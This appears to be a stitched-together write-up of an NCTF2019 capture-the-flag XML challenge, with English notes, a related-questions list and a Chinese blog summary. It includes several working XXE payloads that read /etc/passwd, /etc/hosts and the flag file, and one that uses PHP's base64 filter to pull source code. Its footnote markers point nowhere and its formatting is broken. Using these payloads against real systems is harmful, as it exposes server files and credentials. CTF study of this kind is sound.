###
NCTF2019 True
XML Challenge Solutions and Walkthrough
In the context of the
NCTF2019 competition, several challenges involved exploiting XXE (
XML External Entity) vulnerabilities within
XML documents to achieve various objectives such as file reading or server-side request forgery.
#### Exploiting Basic XXE Vulnerability
An example payload that demonstrates a basic XXE attack is shown below:
```
xml
<?
xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY admin SYSTEM "file:///etc/hosts">
]>
<user>
<username>&admin;</username>
<password>1</password>
</user>
```
This payload attempts to read the contents of `/etc/hosts` by defining an external entity `admin`, which references this system file[^2].
#### Advanced File Reading with Different Protocols
When direct access using the `file://` protocol does not work due to restrictions imposed by some parsers, alternative protocols can be used. For instance,
PHP's filter wrapper allows for more sophisticated attacks where files are encoded before being sent back to the attacker:
```
xml
<?
xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xxe [
<!ENTITY xee SYSTEM "
php://filter/read=convert.base64-encode/resource=/var/www/html/doLogin.
php">
]>
<user>
<username>&xee;</username>
<password>123123</password>
</user>
```
Here, instead of directly accessing the target file via its path, the content of `doLogin.
php` gets base64-encoded through
PHP’s filtering mechanism prior to transmission[^4].
#### Targeting Specific Files on Server
For scenarios requiring specific sensitive information like flags stored somewhere accessible only internally, crafting payloads targeting these locations becomes crucial:
```
xml
<?
xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY admin SYSTEM "file:///flag">
]>
<user>
<username>&admin;</username>
<password>123456</password>
</user>
```
The above code snippet aims at retrieving flag data located under root directory named 'flag'[^3].
#### General Approach Against Black Box Systems
Even without detailed knowledge about internal structures, one could still attempt common paths known across many systems:
```
xml
<?
xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<user><username> &xxe; </username><password> 1 </password></user>
```
By referencing well-known Unix/Linux configuration files (`/etc/passwd`) in the entity definition, attackers may gain insights into underlying OS configurations even when no explicit details were provided initially[^5].
--related questions--
1. How do different web application frameworks handle
XML parsing differently?
2. What measures should developers take to prevent XXE attacks effectively?
3. Can you provide examples of real-world incidents caused by XXE vulnerabilities?
4. Are there any tools specifically designed for detecting XXE flaws during security audits?
5. In what ways has modern software development mitigated risks associated with XXE issues over time?
本文讲述了参与[NCTF2019]FakeXMLcookbook挑战的经历,通过尝试利用XML External Entity (XXE) 攻击来读取系统文件。作者首先尝试了常见的admin账号,然后通过构建恶意XML实体,成功读取了/etc/passwd和flag文件,揭示了Web应用中XML解析的安全隐患。
嗯。。。一开始我的脑子里想到的是禁止自娱自乐[狗头],哈哈,第一想法就是试一下admin,别问为什么,web狗的自觉。
果然没这么容易,抓包:
成功,读取flag
扫一扫
4621
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
